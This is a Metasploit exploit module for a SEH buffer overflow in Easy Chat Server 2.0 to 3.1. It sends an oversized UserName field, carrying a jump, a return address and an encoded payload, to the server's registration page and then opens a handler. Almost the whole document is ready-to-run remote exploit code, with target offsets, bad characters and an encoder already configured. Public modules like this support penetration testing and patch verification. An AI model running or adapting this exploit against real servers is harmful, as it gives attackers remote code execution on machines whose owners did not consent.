Easy Chat Server User Registeration Buffer Overflow (SEH)

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',  
'Description' => %q{  
This module exploits a buffer overflow during user registration in Easy Chat Server software.  
},  
'Author' =>  
[  
'Marco Rivoli', #Metasploit  
'Aitezaz Mohsin' #POC  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'EDB', '42155' ],  
],  
'Privileged' => true,  
'Payload' =>  
{  
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],  
],  
'DefaultOptions' => {  
'RPORT' => 80,  
'EXITFUNC' => 'thread',  
'ENCODER' => 'x86/alpha_mixed'  
},  
'DisclosureDate' => 'Oct 09 2017',  
'DefaultTarget' => 0))  
end  
  
def exploit  
sploit = rand_text_alpha_upper(217)  
sploit << "\xeb\x06\x90\x90"  
sploit << [target.ret].pack('V')  
sploit << payload.encoded  
sploit << rand_text_alpha_upper(200)  
  
res = send_request_cgi({  
'uri' => normalize_uri(URI,'registresult.htm'),  
'method' => 'POST',  
'vars_post' => {  
'UserName' => sploit,  
'Password' => 'test',  
'Password1' => 'test',  
'Sex' => 1,  
'Email' => 'x@',  
'Icon' => 'x.gif',  
'Resume' => 'xxxx',  
'cw' => 1,  
'RoomID' => 4,  
'RepUserName' => 'admin',  
'submit1' => 'Register'  
}  
})  
handler  
  
end  
end  
`